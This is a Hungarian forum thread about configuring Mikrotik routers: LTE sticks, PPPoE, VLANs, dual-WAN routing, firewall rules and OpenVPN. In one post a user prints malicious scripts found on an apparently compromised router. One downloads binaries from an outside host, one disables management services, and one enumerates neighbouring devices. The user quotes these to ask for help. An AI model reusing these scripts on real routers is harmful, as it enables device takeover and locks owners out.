- Honor 200 Pro - mobilportré
- Fotók, videók mobillal
- iPhone topik
- 45 wattos vezeték nélküli töltés jön az új iPhone-ba
- VoLTE/VoWiFi
- Bemutatkozott a Poco X7 és X7 Pro
- Milyen okostelefont vegyek?
- Xiaomi 14T Pro - teljes a család?
- Honor Magic6 Pro - kör közepén számok
- Android alkalmazások - szoftver kibeszélő topik
-
Mobilarena
Mikrotik routerekkel foglalkozó téma. Mikrotik router típusok, hardverek, router beállítások, programozás (scriptek írása), frissítés, és minden Mikrotik routerrel kapcsolatos beszélgetés helye.
Új hozzászólás Aktív témák
-
e90lci
senior tag
Szia
Ja úgy próbáltam.Igazából lusta voltam vele foglalkozni,ezért nem küldtem vissza gariba,működik tökéletesen a wAP saját tápfeladójával.Meg amikor 2 hetente hazamegyek Németből igazából más dolgom is van így hát nincs rá időm sem.VPN keresztül frissítgetem kintről,mert amikor otthon vagyok semmi időm.Mindig akad valami intézni való.
Beniii06
Még nem annyira nem létszükséglet eladni.Csak ez egy hirtelen ötlet ha elmegy el ha nem akkor az marad. -
-
bambano
titán
szerintem a bejövő csomag eltűnik, amikor a tcp stack feldolgozza, a válasz kimenő csomag egy teljesen új csomag, tehát annak a routingjában egy korábban eltűnt csomag routing markja nem nagyon vesz részt.
emlékeim szerint a tcp mindig azon az ip címen válaszol, amin bejött a csomag, tehát nem portra kellene szűrnöd és routing markolnod, hanem publikus ip címre. amelyik csomag ip címe tkomos, annál tenni routing markot, arra egy külön routing táblát felhúzni és megmondani a kernelnek, hogy a másik routing tábla szerint routoljon.
de a lartc-ben ez részletesen le van írva.
-
-
Hát én letesztem Digi PPPoE mellett, de nem hozott létre DHCP klienst - RouterOs 6.43.8. Számomra nem is logikus miért tenné. Sőt, a leírásban sem találtam ilyet. Természetesen ettől még lehetséges.
Igaz, én nem is hsználgatok "Quick Setup"-ot, és ez a konfigom is már több éves. -
Köszönöm!
A *99# elhagyása segített!
A data és info channelek variálásával próbálkoztam, persze, ha máshol a hiba, akkor nem csoda, hogy hiába.
A wikin az AT^SETPORT="FF,12,1,16" egyébként szerintem hibás: minden más forrás szerint AT^SETPORT="FF,12,10,16".
Most hasít a mobilne. 2,5 Mbps észveszejtő sebességgel. A T-s ADSL-nél mindenesetre gyorsabb!
Úgyhogy megrendelem a mPCIe kártyát...
Nagyon köszönöm a segítséget!
MaCS
-
Az e3372 már nem HiLink-rendszerű (^FHVER:"E3372H-153 21.200.07.00.805,CL2E3372HM Ver.A"), és némi sopánkodás mellett lebutítottam PPP-re (AT^SETPORT="FF;12,10,16").
A System - Resources - USB így néz ki:
A System - Ports így:
A PPP interface ablaka így:
A PPP General füle így:
A PPP fül pedig így:
A Status viszont reseting link -- nem kapcsolódik...
Az Általad leírtak szerint létezik olyan stick, ami LTE-ként, LTE sebességgel kapcsolódna a routerrel a nethez? (Mondjuk 60-80 Mbps elvárható lenne...)
A Mikrotik Wiki szerint (ahogy én olvasom) LTE módban az e3372-nek mennie kéne, de nem teszi.
Vagy eleve próbálkozzam egy R11e-LTE modullal? Ehhez milyen antenna kellene?
Köszönettel: MaCS
-
Egy Huawei e3372s (stick mode) és egy D-Link DWM222 áll rendelkezésemre, ezekkel próbálkozom (mintha írtam volna...).
Mindkettő csak keres, csak keres... Azt látom, hogy a rendszer látja (az egyik leírás alapján kb. eddig jutok el).
Az elkövetkező napokban a Huawei lesz kéznél.
Mielőtt beszerezném a Mikrotik LTE-kártyáját, feltétlenül szeretném látni, hogy mit produkál USB-vel.
Köszönettel: MaCS
-
Sikerült kiragadnod egy félmondatot a mondandómból.
Kifejteném, ha nem lett volna világos az eddigiekből: Igen, valóban nem az a célom, hogy megtanuljam a Mikrotik rendszerét, hanem használni szeretném azt -- amihez persze elfogadom, hogy elég sok újdonságot meg kell tanulnom. Szívesen tanulok, érdekel is, de nem ez a motivációm, hanem a használat.
A bonyolultsággal nem az a bajom, hogy összetett a rendszer, hanem azt nem igazán értem, hogy miért csak bonyolultan, a többi rendszer szerintem bevált alaplogikájától eltérően valósítanak meg mindent. Nyilván van ennek jó oka, de mivel még alapjaiban sem értem a rendszer vezérelveit, még csak nem is sejthetem a választ.
Viszont kíváncsi vagyok rá.A jelenlegi gondom, amire a neten keresem a választ, változatlanul a mobilnet beállítása USB-sticken. A vezetékes WAN-kapcsolatra milliónyi egyértelmű leírást találtam, próbaként be is állítottam, működött. A mobilnet nyilván egy rétegigény, de én pont ebbe a rétegbe tartozom.
Egyébként pontosan abba a körbe tartozom, akik szerint fontos, hogy autóvezetéshez legyenek meg a technikai-fizikai alapismeretek. Egy autóvezető tudja, hogy hogyan működik a motor és főleg a fék, mi az a súrlódás és tehetetlenség. Én ennél a routernél viszont tényleg úgy érzem, hogy az autóba ülve a motorvezérlés jelszintjeit és a motorolaj adalékainak a kémiáját kéne ismernem.
És nagyon csendben megjegyzem, hogy olyan baromi triviálisan egyszerű nem is lehet a megoldás, ha senki nem írta még le, és nem hiszem, hogy mindenki az 50 dolláros üzletre pályázik...
MaCS
-
kovyhun
tag
Köszönöm a segítőkészséged, de közben meg lett az oka.
Megint előjött:
Logban találtam:
13:46:18 interface,info ether1-WAN detect WAN
13:46:33 dhcp,info dhcp-client on ether1-WAN got IP address 192.168.0.100A Detect Internet" gomb alatt a "Detect Interface List" All-ra volt állítva.
Kikapcsoltam, azonnal el is tűnt a dhcp kliens a wan portról.
-
bambano
titán
"A pppoe elavult lehet": lehet igaz
"meg legalábbis mikin erőforrás igényes is": nem igaz, a kernel pppoe driver minimális terhelést okoz.
"de a szolgáltatónak sokkal egyszerűbb így az előfizetői csomagba sorolás, illetve váltás.": tévedés. minden sokkal bonyolultabb, ha van pppoe. pláne, mikor cisco-s tanfolyamon kiképzett valakitől örökölsz hálózatot, és csak vakarod a fejed, hogy miért olyan bonyolult..."A DHCP -s ip kiosztásnál is sokkal jobb": nem jobb.
"még tizen éve állandó probléma volt (ahol én lakom), hogy valami szintén hozzáértő fixre állította a tcom -s kábelmodemjét.": a kábelmodemen semmit nem tudsz állítani. az egy másik kérdés, hogy a kábelmodemre dugott eszközzel mit csinál, ilyet nálunk is próbált egyszer valaki, de mivel a fél falu hallotta, hogy mit mondtam rá, többet nem próbálta meg senki. most attól tekintsünk el, hogyha nem gagyi cisco-t használsz, hanem rendesebb cuccot, pl. arrist, akkor az ilyet kideríteni kevesebb, mint két perc. -
#6439
adam900331
csendes tag
bacus
#6434
adam900331
csendes tag
Az alábbi két firewall szabállyal megtudtam oldani a dolgot. A hálózatból elérhetőek az eszközök B-ből, vissza viszont nem.
10 chain=forward action=drop connection-state=new src-address=192.168.10.0/24 dst-address=192.168.1.0/24 log=no log-prefix=""
11 chain=forward action=accept connection-state=established,related src-address=192.168.1.0/24 dst-address=192.168.10.0/24 log=noKöszi a segítséget.
-
bambano
titán
azt kellene megérteni, hogy a tűzfallal forgalmat tudunk korlátozni. generálni nem.
tehát először legyen forgalom, vagyis legyen rendben a routing, utána lehet korlátozni, hogy ki hova.tűzfal szabályokról vitázni addig, amíg nem tudjuk a fizikai topológiát, meg hogy mi van a routinggal, pusztába kiáltott szó.
-
A_ScHuLcZ
addikt
Minden port vlan-ba fog kerülni, mindenkinek a saját vlan-beli vlan interface lesz a gateway-e, olyan kliens nem lesz, aki simán a bridge-be kerül vlan nélkül. A példában egyelőre az ether2-t és ether3-t és egyetlen vlan-t, konfiguráltam, hiszen amíg ez nem megy, addig felesleges tovább haladni.
Ha sikerül összelőni, akkor 3 vlan-om lesz az alábbi felosztásban:
ether1: ISP
ether2: trunk (vlan 2 tagged, vlan 3 tagged, vlan 4 tagged, vlan 1 untagged)
ether3: vlan 2 untagged
ether4: vlan 3 untagged
ether5: vlan 4 untagged
(az ether2-3-4-5 ugyanazon bridge tagjai)ekkold: ott hozzáadtam a bridge alá, ahogy az oktatóanyagban is található. Természetesen oda fel kell majd venni a többit is, de amíg egy nem működik, addig feleslegesnek éreztem.
Core2Duo6600: MAC alapon se megy, miután bekapcsolom a vlan-filteringet a bridge alatt. Ha kikapcsolom, ismét elérem a MAC cím segítségével. ether3-ba volt a gép, ott a vlan 2 untagged módban jön ki, és tudtam is pingetni a router vlan interfészét (192.168.2.1) a vlan-filtering bekapcsolása után, tehát ez a rész látszólag jól működött.
A jelenlegi eszköznél csak 2 vlan-t használok, de ezzel a módszerrel anno gond nélkül sikerült beállítani mindent, a vlan-ok közötti átjárást a tűzfal szabályozza.
-
#6332
Core2duo6600
veterán
bacus
#6317
Core2duo6600
veterán
Akkor elmondom, hogy kötöttem ki a Mikrotiknél.
Amikor elérhetővé vált a Digi kötöttem egy 500 Mbites sebességű internetelérést.
Első dolgom volt bridgbe kapcsoltatni a digi eszközét, ami routerként és N es wifi ként is funkciónált, és ha csak az az egy eszköz volt a hálózat feje, még stabil is volt, de gyakorlatilag 0 beállítási lehetőséggel.
A wifi jelszót és a Portforwardon kivül gyakorlatilag mást nem lehetett beállítani.Ezután vettem egy RV325 ös routert a Ciscotól, és hát csalódás volt, mert sebességben nem hogy a mostani 1 gbitet, de még az 500 at sem tudta, valahol 100 körül lehetett a vége.
Ekkor kezdtem el olvasgatni, kérdezősködni többek közt a PH fórumain is.
Megkaptam az az infot, hogy ahhoz, hogy egy időben 2 internetelérést használjak, egyik gép egyiket míg a másik a másikat stb, akkor nekem a policy routing-ra van szükségem.Ezek után kerestem olyan eszközöket amik ezt tudják, találtam egy drytek típust, de ezen kivül más infot nem nagyon találtam róla, és elég drága is volt, aki ezt ajánlottam, néhány mbites elérést használt egy cégnél.
A cégnél a hálózat tervezők, részben üzemeltető mérnők, aki Juniper ill. fortinet szakértő a Synology-t javasolta.
Na hát az is vagy 100 000 volt, de konkrétan a policy routingot nem találtam meg leírásában, és a dual wan ra sem találtam utalást, senki nem tudta megmondani azt sem, hogy biztosan elviszi-e a gigabitet pppoe kapcsolaton keresztül.Ha meg már ennyit ráköltök egy routerre, akkor elvárásom, hogy tudja a kezelni a 2 wan elérést, és az ezt lehetővé tévő policy routingot, valamint ismerje a VLAN kezelést.
Így eljutottam a Mikrotikhez, egy HEX RB 750 gr3 as-t vettem, beállítottam.
Az alap konfig megvolt kb 5 perc alatt, úgy hogy elötte nem láttam mikrotiket még, a default konfigját nem használtam.
Egyszercsak jött egy e-mail a Digitől, hogy mostantól megemelik az elérésem 1 gbit/sec esre.
Na ez már sok volt az RB 750 gr3 asnak.
Erőből fast track avagy HW nat nélkül, úgy kb 450 Mbit /sec et tudott.
No akkor keresgéltem tovább, néztem mindenfélét a Junipertől a Cisco-ig mindent, még a Ubiquiti is látófénybe került.
Fontos volt, hogy néma legyen, mert hálószobában van,
és gyakorlatilag egyedül a RB1100 AHX 4 es felelt meg ennek.
Amit meg is rendeltem.
Ez az az eszköz ami megfelelt minden igénynek figyelembe véve az árát is.
A wifi és a kábeles elérés lényegében azonnal külön lett választva, sokáig ugyanazt az elérést használta mind a 2 hálózat, de nem láttak rá egymásra.
Kisebb utánaolvasással megcsináltam azt is, hogy 1 kábelen küldöm le a földszintre a kábeles és a wifis hálózatot is vlan segítségével.
Felül a miki, lent egy Cisco switch (SG200-08) segítségével.
Ez is meglett úgy 20 perc állítgatás után.Ezután jött az igény a Wifi ről való nyomtatásra,aminek a kérdése elindított sok féle reakciót a felhasználókban.
Nem azt vártam, hogy csináld meg helyettem.Jelenleg elvileg jó a beállítás a próbanyomtatás még nem volt, aludtak a szobában ahol a nyomtató van, a web felülete bejön.
-
ekkold
Topikgazda
Tehát van egy routere egy miktorik témában kezdőnek számító felhasználónak.
Mondjuk használtan vett egy régebbi, de komolyabb típust, ami azért ma is megállja a helyét: RB1100AHx2, Mostanában hírdetett valaki ilyet 40eFt körül. (semmi közöm a hírdetőhöz és a hírdetéshez)
Ezek után amikor kérdez: menj tanfolyamra....
Még viccesebb ha egy soho kategóriás routert akar beállítani amit mondjuk 10eFt-ért vett, majd elolvassa a lentieket.Nézzük csak, mi is az aktuális helyzet! A google első találatai között:
MTCNA (Mikrotik Certified Network Associate) tréning,
Kalapos László oktató
A következő oktatás időpontja és helyszíne
Dátum: 2019. január 16-18.
És a piszkos anyagiak?
Az oktatás ára: 59.990 Ft+ Áfa. -> azaz 76190FtMég most sem tűnik irreálisnak?? Nem kezdek el találgatni, vagy legalább is nem írom le. Amúgy szívesen elmennék ilyen tanfolyamra én is, ha mondjuk a munkáltatóm finanszírozná. A gyakorlat meg a valóságban az, hogy: itt ez a router, ezt kell tudnia, állítsd be... Vagy még jobb sorrend: Ezt kell tudnia, melyik a legolcsóbb tipus ami erre alkalmas, vegyük meg, állítsd be.
-
#19482368
törölt tag
Megmondom őszintén nem értem, az előbb azt írtad ejtsük a téma további kitárgyalását, és most ismét elő veszed.
bacus, igazad van, egy tanfolyam mindenkinek csak előnyére válik. Rengeteg felesleges kört tud megspórolni magának az ember. Igen jól látod. De azt kell elfogadni, hogy akinek ebből nem lesz "haszna" ergo nem ebből él, annak elég egy alap, és kalap-kabát. A helyzet az, azt az alapot, gyakorlatilag megtalálja minden érdeklődő az interneten. Sőt Kalapos Lászlónál meg is vásárolható az alap oktató csomag. Emlékeim szerint 10.000FT.
Na de vesz valaki egy 20-30.000Ft eszközt, az közel se biztos hogy 10.000Ft ki fog adni egy alap oktató csomagért. És akkor hol van a többi oktatás ára, a vizsgák árai. Főleg úgy, hogy az alap csomag 80% megtalálható az interneten.Annak idején Kalapos László egyik munkatársával beszélgettem erről. Az ő meglátásuk az, hogy az aki csak felhasználói szinten akarja használni, annak felesleges bele mennie komolyabb vizsgákba, tanfolyamokba.
Miért? mert a rá fordított összeg, nem térül meg. Értsd úgy, aki nem üzleti szinten, vagy céges szinten foglalkozik vele, egyszerűen nem éri meg. Ha céges szinten nézzük akkor alap, hogy képezze magát az illető, és erre sok esetben még támogatást is kap az adott cégtől. Tudom nem mindenhol, sajnos. Szóval lakossági szinten egyszerűbb megoldás, ha keres egy ilyen céget, akin keresztül meg veszi a kiválasztott terméket, és egy egyedi megbízásra kér plusz árajánlatot, hogy az egyedi igényednek megfelelően azt beállítsák.
Ez egy tiszta, sima ügy. És lakossági szinten így kellene működnie. De nem így működik, mert mindenki érzékeny a pénztárcájára, és bár mindenki tudja hogy a tudásnak ára van, és a tudás, tanulás mindig meghálálja, ennek ellenére inkább választják sok esetben a rögösebb utat, mert... Itt a fórum, ha nem ez akkor más, és akinek van rá affinitása, az szivacs módjára magára fogja venni a szükséges információt. Nem kell hogy mélyre hatolóan ismerje. Csak annyit ami szükséges céljai eléréshez. És ez a tendencia az élet más területein is jelen van. Ezzel nem fogsz tudni mit kezdeni sose. -
#6313
Core2duo6600
veterán
bacus
#6287
Core2duo6600
veterán
Köszi,
Így már kiderült, hogy milyen hatással van a passthrough a szabályra.
Abban biztos lehetsz, hogy csak a saját szorakoztatásomra nem fogok tanfolyamra menni.
Hisz össze lehet szedni az infokat a netről igaz van hogy könnyebben, vagy nehezebben.Unatkoztam, ezért csináltam meg dual wan -t is, semmi értelme és haszna, de ha már itt lóg a telekom kábele, akkor már legyen használva, hűségidő miatt van csak itt.
Abban is biztos lehetsz, ha céges felhasználás lett volna, akkor már kerestelek volna ez ügyben.
-
#19482368
törölt tag
Ja a határok, igen elég nehéz eldönteni mettől meddig van segítség, és mi az a határ, ami már sértheti az üzleti érdekeket. Talán, nem is lehet ezt normálisan meghúzni.
Hogy szakmai fórum? Hát mihez képest? Merül fel a kérdés. A helyzet az, hogy nem egy volt kollégám messziről el kerüli ezeket a fórumokat. Miért? Mert hatékonyabb, releváns segítséget kap az adott termék támogatási fórumán, supportol. A másik, hogy egy magára adó cég, biztosítja a továbbképzést, tanfolyamokat.
Tehát, marad a lakossági szegmens, az esetek X%-ban. Na már most lakossági szinten, ha nem tőled, akkor mástól, de meg fogja szerezni a szükséges információkat. De megfogja jegyezni, hogy ki viselkedett vele …. És a későbbiek folyamán akár lehetnek kellemetlen pillanatok, akár az élet más területein. Mert az emberek, már csak ilyenek.
Hidd el, sokkal praktikusabb megoldás, minősítés, degradálás mentesen segíteni, vagy éppen egy laza mozdulattal tovább lapozni, ha nem akarunk segíteni a másiknak. -
#19482368
törölt tag
Alapvetően teljesen igazad van. Ez nem is kérdés. Ami a különböző tanfolyamokat illeti, és abban is helytálló a megállapítás hogy mindenki mindenhez ért. Sajna ez van, és soha nem fog változni. Az lemaradt, hogy mindig az informatikus a hülye.
És a home rendszergazda a király. Mert olcsó, mert szinte majdnem mindent tud.De.... Különböző fórumok arra a nemes célra építenek, hogy egymással tapasztalatot cserélnek, és egymás segítésére elvre. Valami Openszósz szerűre.
Persze abba nem gondol bele senki, hogy aki ebből él, annak kevesebb ügyfélköre lehet emiatt. De ha csökken az ügyfélkör, arra meg azt mondják, azért mert lehet te csinálsz valamit rosszul. Abban is igazad van, hogy érdekes módon az agysebészet területén ilyen helyzet eddig nem fordult elő. Ördögi kőr ez, én mondom, aminek sose lesz vége. Az én tapasztalatom az, hogy nem szabad minősíteni senkit, mert nem tudhatod holnap nem-e pont ő ad munkát, vagy éppen segít ki az élet más területén. Mondhatni, már, már, nép bölcsesség Ami a tanfolyamokat illeti, az a helyzet, hogy aki lakossági szinten mozog, nem fog rá áldozni. Azért mert a beleinvesztált összeg, nem fog megtérülni sose. A lakosság javarészt All-In-One eszközöket használ, aki ki akar lépni ebből, az meg a megszokott szivacs elvet fogja előnybe részesíteni, és maga faragja, akár saját kárán.
Ez a tendencia egyáltalán nem új keletű. Ha vissza mész az időben, annak idején ha valaki fel tudott telepíteni egy operációs rendszert, legyen az DOS, vagy Win3.1, XP az már szakértőnek számított.
Szóval, a rossz hír az, hogy vannak dolgok amik nem változnak, és ez az. Így véleményem szerint, teljesen felesleges degradálni, sokkal hatékonyabb megoldás a segítőkészség egy bizonyos szintig. Így meg tudsz maradni jó fejnek. -
#6272
Core2duo6600
veterán
bacus
#6270
Core2duo6600
veterán
Értem, köszönöm.
Hogy lehet megoldani azt, hogy mind a 2 elérés a saját dns szerverét használja.
Tehát ha a telekom vonalon megy ki az eszköz, akkor az a kapcsolat a telekomét, úgy, hogy a dhcp magát a mikit jelöli dns szervernek, míg a digi vonalon a digiset.Most próbálkoztam nem az éles rendszerrel, hanem a másik RB750 essel.
Ebbe is belekötöttem egy drótot a telekom dobozából, és egy másikat a digi modeméből.Megcsináltam a szokásos alap beállításokat, ip cím, dhcp, nat stb ...
Most a telekomos kapcsolatot állítottam be először, működött szépen.
Utána megcsináltam az egyik portot wifi ap nek, és betettem egy wifi nek hívott bridge-be,
és rákötöttem egy öreg AP ét.Miután létrehoztam a digi felé a pppoe kapcsolatot abban a pillanatban megállt minden.
Amikor a nat nál átállítottam, hogy ne a telekomost, hanem a digiset használja, elindult a kábelesen a net.Majd megcsináltam a wifis re is a beállításokat, kapott ip címet, de forgalom az nem volt, wifin a telot kapcsoltam rá.
Ekkor megcsináltam a mangle alatt a rputing markot a wifi számára a telekom irányába, majd a route nál is felvettem, elindult a wifis a telekom irányába.
Ekkor gondoltam, hogy megcsinálom a routing markot a kábelesre is.
Beállítottam, felvettem még egy route szabályt a digit használva, és itt is beállítottam a hogy melyik routing markot használja.
Ugye most 3 közül lehettet választani.ISP_Telekom
ISP_Digi
main
értelemszerűen mind a 2 nek a rá utaló elnevezést használtam.Viszont, ha letiltom azt a routing mark szabályt, ami a kábelesre vonatkozik, miért műkődik tobább a kábelesen az elérés a digi vonalával ?
Igaz addig is ment, amíg nem volt beállítva rá semmi.Miért ?
Az éles rendszeren csak a telekomos irányba van routing mark.
Azon kivül, hogy "csálén" néz ki, nem pontosan értem, hogy miért műkődik a digi felé, ha nincs beállítva semmien routing mark.
A telekomosnak meg miért van szüksége rá ?Hogy lehet rávenni arra, hogy csak a routing mark on keresztül menjen, és a main esetében meg ne ?
(#6271) jerry311
Az egész a nyomtatás irányából indult el.
Maga a net elérés az műkődik.Eme poszt elején próbálkoztam, nem az éles rendszert használva, hanem egy korábbi mikit bekötve, így nem rontom el az éles rendszert.
-
#42556672
törölt tag
Ő írta, hogy a két hálózatban lévő eszközök nem látják egymást...folyamatosan csöpögött az infó!
Majd megírta, hogy tűzfal szabállyal blokkolja
Majd leírta, hogy a nyomtatás kikapcsolva a tűzfal szabályokat sem megy, ám a nyomtató WEB-es konfig oldala bejön
Majd említette, hogy amikor nyomtat a kliens eléri a nyomtatót csak valami hibaüzenetet kap ami nem dekódolható mert csak egy LED villog.
Zavaros!
Én NAT-tal oldanám meg, az a legegyszerűbb. A két subnetnél pedig nem tűzfalszabályt használnék hanem a route részben a plicy-k közé felvennék egy szabályt minél drop-ot raknék a két hálózat között routolandó csomagokra.
Kinek a pap....
-
#6248
Core2duo6600
veterán
bacus
#6246
Core2duo6600
veterán
Igen, ez a miki az átjáró is.
(kényszerből a telekom felé dupla nat van, mivel az ip tv miatt nem lehet bridge be kapcsoltatni azt az eszközt)A nyomtató a mikire, pontosabban az abba bekötött switchbe van csatlakozttava
A 2 internet elérésre megfelelő a prerouting - mark routing alkalmazása a mangle alatt ?
A ip/route ba fel lett véve egy route szabály a telekom irányba is,
(#6247) Kovindinka
Csináltam egy, pontosabban 2 tűzfalszabályt ami tiltja wifi > lan és a lan > wifi irányt. -
ekkold
Topikgazda
Jogos, a saját felett átsiklottam. Az ismerősnek javítás néha tud szívás lenni, de ez adott esetben kölcsönös, mert legközelebb esetleg én kérek szívességet ugyanattól az ismerőstől. Olyan esetben amikor ez nem működik akkor nyilván én is az egyszerűbb megoldást választom (pl. vegyünk új routert).
Ugyanakkor azért néha el tudok képzelni olyan kompromisszumot is, amivel mindenki jól jár. Mindhárom variációra tudnék konkrét esetet mondani. -
ekkold
Topikgazda
Kapacitást nyilván nem az áramkörben mérünk, zárlatot viszont általában igen. Lehet, hogy nem különítettem el eléggé a hozzászólásban, de nekem egyértelműnek tűnt..
Ha pl. mondjuk egy routert megjavítok 1 óra alatt, és 20eFt lenne az új board - akkor elég jó órabér jön ki. A gyakorlatban még a felének is igencsak örülnék... Ha valakinek van affinitása hibát keresni, és a forrasztópáka sem teljesen idegen számára, akkor azért megér egy próbát szerintem.
-
-
akos86
aktív tag
Igyekszem megtanulni mindent amit lehet, a videókat és tananyagokat azért nézegettem mert érdekel és főleg azért mert a cégnél ahol dolgozom Mikrotiket termékeket használunk, nyilván ez nem egyenlő a tp link és társaival katt katt és kész. Remélem hogy összejön itthon is lecseréltem mindent erre a márkára mivel atomstabil ha jól be van állítva. Köszönöm az eligazítást.
-
kovyhun
tag
Szóval elég lett volna a dhcp kliens kikapcsolása? Azt hittem a pppoe használja a dhcp klienst azon át adja meg az ip-m, így gondoltam ha kikapcsolom mégiscsak kell valami cím...
Így megadtam a szerződésben szereplő ip-címemet a wan portnak. Akkor erre nincs szükségem, kitörölhetem?
Szerencsére nem kellett kirándulnom -
ekkold
Topikgazda
Megvalósítható-e caps-al a következő (jelenleg egyénileg vannak konfigurálva):
- Fő router (hAPac2):
2,4GHz-en két hálózat (fő és vendég), 3 különböző ssid (1 főhálózaton és 2 vendéghálón)5GHz egyelőre csak a fő hálózat 1db ssid
- AP1 (RB951G)
2,4GHz-en két hálózat, 4 különböző ssid (2 főhálózaton és 2 vendéghálón)- AP2 (haPAac)
2,4GHz-en két hálózat, 5 különböző ssid. 2 a főhálózaton, 2 a vendéghálón + 1ssid egy IPcam számára. Ez utóbbi elkülönített IP tartományban (nem kap netet), AP2 oszt neki IP-t, és ennek az RTSP elérését (egyetlen port) dst-natolja az AP2, a saját IP címére. Így én elérem a kamerát viszont a kamera nem ér el semmi egyebet.
A kamera külön hálózata ill. IP tartománya nem látszik a hálózat többi részéből.5GHz egyelőre csak a fő hálózaton 1db ssid (később 2 ssid kell majd a fő hálózatra)
Mindegyik AP-n van még néhány további ssid, ami alaphelyzetben nem használt (le van tiltva), de néha be kell kapcsolni, egyszerre többnyire csak egy AP-n.
A fő háló közvetlenül, a vendégháló ezen belül egy VLAN-ban jut el az AP-khoz, UTP kábelen.
Jelenleg minden működik, ahogy kell. Tehát érdemes-e caps-al küzdeni? Könnyebb ill. átláthatóbb lenne-e tőle a kezelése?
-
Találtam egy "cgret" nevű fájlt a következő tartalommal :
"#!/flash/xbin/bash
if [ "$2" == "" ]; then
echo "dst?"
exit
fi
/nova/bin/info '/tool fetch host="cloudrouter.online" url=("http://104.24.112.169/images/".[/system resource get architecture-name]."/'$1'") dst-path=tmpdf1'
mv /flash/rw/pckg/tmpdf1 $2"Volt egy "exsvc.rsc" nevű fájl :
"# oct/03/2018 04:24:32 by RouterOS 6.37.4
# software id = xxxx-yyyy
#
/ip service
set telnet disabled=yes
set ftp disabled=yes
set www disabled=yes
set ssh disabled=yes"Egy "r1.rsc" fájl :
"/foreach m in=[/ip neighbor find where platform~"MikroTik"] do={/put ([/ip neighbor get $m version]." ".[/ip neighbor get $m software-id]." ip=".[/ip neighbor get $m address4] )}"
Találtam egy "bbox.jpg" fájlt, ami nem kép az tuti. Nem elemezgettem még.
És még egy "mikrotik.php" neű fájlt, de ennek 0 byte a mérete (?). -
Én két hete találkoztam egy ilyen Mikivel. A kollégák szóltak, hogy nem érik el a mögöttes szolgáltatást (nem ment a Port-Forward). 6.37.5 volt rajta, a kutya nem foglalkozott vele. Átirogattak néhány tűzfal szabályt, meg scripteket. Majd ha gép előtt ülök, bemásolok néhány szemelvelényt (már amit lementettem).
Ami érdekes, nem tudom frissíteni rajta a ROS-t. Megfogott. -
-
brickm
őstag
Pedig annak a szabálynak is számol a számlálója, elvileg a restart óta 287 csomag ment át rajta, , 142kB adat. ami reális lehet abóbl kiindulva, hogy azóta a fő masq- en 8700 cosmag és 1430kB adat ment át. Belépkedtem a géppel meg a telóval és kipróbáltam tud-e pingelni meg netezni.
Egyébként azért raktam be, hogy tudjak a VPN becsatlakozással is netezni távolról az itthoni IP-mmel, mindjárt megnézem ha kiveszem is tudok-e. (szerk:: kivettem, így a kliens nem megy ki a netre, tehát kell a masq szabály a pool-ra ha netezni is akarok vele.)
Pár nap múlva megint elém kerül a win7-es kliens, kipróbálom ujratlepítek mindent rajta amit tudok épp(egyébként tázfal ki van teljsen kapcsolva rajta már, rendszergazda a fiók, hálókártya sorrendet is módosítgattam stb...)
Egyébként az egy erősen vállalati környezetben van, mint ahogy a topológián is láthatod, viszont a telómat feltettem ugyan arra a hálózatra, és az akkor is hazajött, szóval mennie kellene.
(Ja igen, pl a tescobol nem tudok hazajönni a telefonnal se, gondolom ők a 41194-es portot kiszűrik)Köszönöm neked is és bambano-nak is, hogy foglalkoztatok a problémámmal!
Ha sikerül beléptetni a másik gépet is jelentkezem. -
brickm
őstag
A win10 most ezt kapta:
IPv4 Address. . . . . . . . . . . : 192.168.90.122 Subnet Mask . . . . . . . . . . . : 255.255.255.0 Default Gateway . . . . . . . . . :
A win 7 is 90-es tartományba kap, de mikor melyik címet. Ránzésre nem tűnt rendellenesnek. Az tűnt annak, hogy a Def gateway üres, de most is üres a win10-é, amikor jó.A win7 ről semmit nem tudok pingelni, ezért is gyanakodtam az átjáró hibára elsőre. Sőt a routerből se tudom pingelni azt az IP-t amit ad a win7es gépnek, pedig az uptime pörög, active a kliens elvileg.
/firewall filter
1 ;;; Accept OpenVPN connection
chain=input action=accept protocol=tcp dst-port=41194 log=no log-prefix=""nat
4 ;;; masq LAN selective pool (Selective masq. lists)
chain=srcnat action=masquerade src-address-list=selective masq. out-interface=pppoe-out1_DIGI
log=no log-prefix=""
5 ;;; OpenVPN masquarade
chain=srcnat action=masquerade src-address=192.168.90.0/24 out-interface=pppoe-out1_DIGILehet az a baj, hogy masquarade-elem a VPN poolt is?
99%ban eddig egy eszköz volt fent, a telefonom. Azért volt jó valószínáleg a /32, vagy a telefon ignorál páér dolgot config fájlból... ez passz számomra.
A win7 is belép, csak semmit nem tud kezdeni a hálózaton\vele se lehet kezdeni semmit. De fizikálisan látom a routerben az active connection listában... az uptime is megy.
-
brickm
őstag
Igen mode ip van,
ethernetnek kellene lenni?
A githubos script nem határozza meg, így gondolom az IP mode az alapbeállítás.[link]
[link]
(a route- listbe nem kell semmi? erről nem találtam érdemben semmit és a két tutorial se csinál vele semmit)>>SZERK: már látom, automatán hozzá adja mikor belép egy kliens
.ovpn:client
proto tcp-client
port 41194
#remote 192.168.0.1
remote XXX.sn.mynetname.net
dev tun
nobind
persist-key
route 192.168.0.0 255.255.255.0 192.168.90.1
tls-client
ca ca.crt
cert client.crt
key client.key
redirect-gateway def1
ping 10
verb 3
cipher AES-256-CBC
auth SHA1
pull
auth-user-pass
auth-user-pass user.authuser.auth példa.
1.sor:dell
2.sor:generált password(ugyan az, mint a secretben)A cert file-okon jelenleg nincs passphrase, mert ha ráteszem az iphone nem tud vele belépni.
[link]Kliensből már bezséltük, hogy a régiek jobbak. Kezdtem 2.2.2.-vel, és kb mindet kipróbáltam már. Jelenleg a 2.4.6 van fent mindkét gépen. A win10-es már belép hiba nélkül. De a win7es kakókifli.
-
brickm
őstag
Szia, a hiba a következő:
[link]A hálózati topológia főbb elemei a következők:
[link]A két narancs kliensből akarom elérni a pirosat.
Illetve az iphone 7 is kliens amikor épp nem adja a netet a win10-es PC-nek.
A jobb szélső topológiát természetesen nem ismerem 100%osan, a tracertből bogarásztam ki az átjárókat. -
"openvpn nagyon jó, de a kliens konfig fáljában is van egy pár beállítás amit el lehet rontani, szemben mondjuk az l2tp vagy sstp, pptp -nél, ahol nincs a kliensen beállítás"
Hát én PpTp és L2Tp esetén is tudok állítgatni: pl ez legyen-e az alapértelmezett átjáró, vagy ha nem, akkor milyen hálózat/hálózatok találhatóak a kapcsolat mögött.
Persze egy OpenVpn konfig fájl telis tele van minden földi jóval :-) -
ekkold
Topikgazda
